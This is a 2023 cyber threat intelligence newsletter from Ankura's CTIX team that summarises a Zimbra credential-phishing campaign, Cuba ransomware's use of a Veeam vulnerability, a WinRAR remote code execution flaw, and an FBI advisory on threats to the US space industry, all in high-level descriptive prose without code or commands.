Malware Activity
New Social Engineering Campaign Targeting Zimbra Collection Users
Researchers have uncovered a "mass-spreading" social engineering campaign targeting Zimbra users within small and medium businesses as well as government entities. The campaign has been observed targeting entities primarily in Poland, Ecuador, and Italy, and targets users of the Zimbra Collection platform, which is an "open-core collaborative software platform" that is a common enterprise email alternative. The threat actor responsible for the campaign has yet to be attributed and the goal appears to be collecting account credentials. Campaign targets receive a phishing email with a warning about an email server update, account deactivation, or similar issue and prompts the user to open an attached HTML file containing a phishing page. The sender is spoofed to appear as an email server administrator. Once the attached file is clicked, the file is opened in the victim's browser and a fraudulent and customized Zimbra login page appears. Researchers noted that the username field in the fake login form is prefilled to appear more legitimate. If the user submits credentials, the credentials are sent to the actor-controlled command-and-control (C2) server. The campaign has been active since April 2023. Additional technical details as well as indicators of compromise (IOCs) can be viewed in the report linked below.
- The Hacker News: Zimbra-Based Social Engineering Campaign Article
- ESET: Zimbra-Based Social Engineering Campaign Report
Threat Actor Activity
Threat Profile: Cuba Ransomware
Activity related to the Cuba Ransomware Gang has increased in the past several weeks after security researchers uncovered an ongoing campaign from associated threat actors targeting United States critical infrastructure. The Cuba Ransomware Gang, also known as Fidel/COLDDRAW ransomware, has been active in the threat landscape since 2019 and specializes in the compromise and exploitation of organizations throughout Ukraine, Latin America, and more recently the United States. These actors follow in the footsteps of many modern ransomware operations by implementing double-extortion tactics in their attacks. Malicious payloads often deployed in Cuba Ransomware attacks include the “RomCom” remote access trojan (RAT) and “Industrial Spy” malware. In a recent campaign, Cuba Ransomware actors have been observed compromising organizations through a vulnerability within Veeam Backup & Replication products, tracked as CVE-2023-27532. This vulnerability allows threat actors to access the encrypted credential listing within the configuration database of Veeam products. According to security researchers, Cuba Ransomware has attempted to compromise a critical infrastructure organization within the United States through the Veeam vulnerability. Additional technical details of the recent Cuba Ransomware campaign, including detailed malware analysis, tactics, and techniques are provided in the reports below. CTIX continues to monitor threat actor activity worldwide and will provide additional updates accordingly.
Vulnerabilities
Vulnerability in RARLAB WinRAR Allows Attackers to Conduct RCE
A high-severity zero-day vulnerability has been identified in the file archive and compression tool for Windows, WinRAR. WinRAR is used to backup and compress data, reduce the size of attachments for email, uncompress RAR, ZIP, and other files downloaded from the internet, as well as create new archives in the RAR and ZIP file formats. The flaw, tracked as CVE-2023-40477, is described as an improper validation of inputs vulnerability that could allow an attacker to access data outside the bounds of an allocated memory buffer in backup volumes. If successfully exploited, this vulnerability could allow threat actors to conduct remote code execution (RCE) through vulnerable instances of WinRAR. Although the vulnerability is quite severe if successfully exploited, it received a CVSS score of 7.8/10 due to successful exploitation requiring user interaction. A threat actor would first need to trick the victim into visiting a malicious page or opening a maliciously crafted archive file via a social engineering attack such as phishing. The vulnerability exists in all versions of WinRAR prior to 6.23. CTIX analysts recommend that users ensure they're running the most recent version of the software.
- The Hacker News: CVE-2023-40477 Article
- WinRAR: CVE-2023-40477 Advisory
- Zero-day Initiative: CVE-2023-40477 Advisory
Honorable Mention
New Advisory Warns of Foreign Attacks on Space Industry
The Federal Bureau of Investigation (FBI), the National Counterintelligence and Security Center (NCSC), and the Air Force Office of Special Investigations (AFOSI) published an advisory on August 18, 2023, warning of increasing cyberattacks targeting United States-based space companies by suspected foreign intelligence services. The advisory mentions the space industry's increasing importance to the global economy and the growing dependence of critical infrastructure on space-based assets, making it a valuable target for foreign intelligence entities (FIEs). US space-related innovations and assets pose a threat to FIEs but also serve as a target of opportunity to gain technologies and proprietary data. Methods of obtaining access to the US space industry have included cyberattacks and the targeting of key supply chain nodes as well as foreign strategic investments such as joint ventures and acquisitions. The threat to the US space industry is multi-layered, with the advisory warning that cyberattacks not only target intellectual property and the raw data collected by satellites, but attacks are also set up to identify severe vulnerabilities within space infrastructure to gain distributive capabilities. Space infrastructure has increasingly been seen as being fundamental to almost every aspect of society, from emergency services to the energy, finances, telecommunications, transportation, and food and agriculture sectors. With industries continually relying on space services to operate, the industry is increasingly sought after and many have repeatably urged to formally name space as a critical infrastructure sector. CTIX analysts will continue to monitor attacks against the space industry and provide updates as necessary.
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the Flash Team (flash@ankura.com) if additional context is needed.
© Copyright 2023. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
